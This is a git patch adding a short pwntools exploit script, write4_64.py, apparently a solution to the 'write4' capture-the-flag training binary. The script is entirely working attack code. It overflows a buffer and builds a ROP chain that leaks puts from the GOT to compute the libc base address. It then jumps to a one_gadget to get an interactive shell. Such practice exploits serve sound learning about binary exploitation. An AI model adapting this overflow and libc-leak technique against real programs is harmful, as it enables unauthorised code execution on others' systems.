From cbd9161036e82005f2cf8306bc1ce2c8fc12b5d5 Mon Sep 17 00:00:00 2001
From: Arav Garg <39301993+AravGarg@users.noreply.github.com>
Date: Sat, 28 Mar 2020 17:38:17 +0530
Subject: [PATCH] exploit for 64-bit write4 binary

---
 write4_64.py | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 write4_64.py

diff --git a/write4_64.py b/write4_64.py
new file mode 100644
index 0000000..9765496
--- /dev/null
+++ b/write4_64.py
@@ -0,0 +1,34 @@
+from pwn import *
+target=process('./write4')
+elf=ELF('./write4')
+libc=elf.libc
+print(target.recvuntil("already!\n> "))
+
+payload="A"*40
+
+poprdi=0x400893
+puts_plt=0x4005d0
+puts_got=0x601018
+pwnme=0x4007b5
+one_gadget=0xe652b
+
+payload+=p64(poprdi)
+payload+=p64(puts_got)
+payload+=p64(puts_plt)
+payload+=p64(pwnme)
+payload+=p64(0x0)
+
+target.sendline(payload)
+
+leak=target.recvuntil("\x0a").strip("\x0a")
+libc_puts=u64(leak+"\x00"*(8-len(leak)))
+libc_base=libc_puts-libc.symbols["puts"]
+print(hex(libc_base))
+libc_gadget=libc_base+one_gadget
+
+payload="A"*40
+payload+=p64(libc_gadget)
+
+target.sendline(payload)
+target.interactive()
+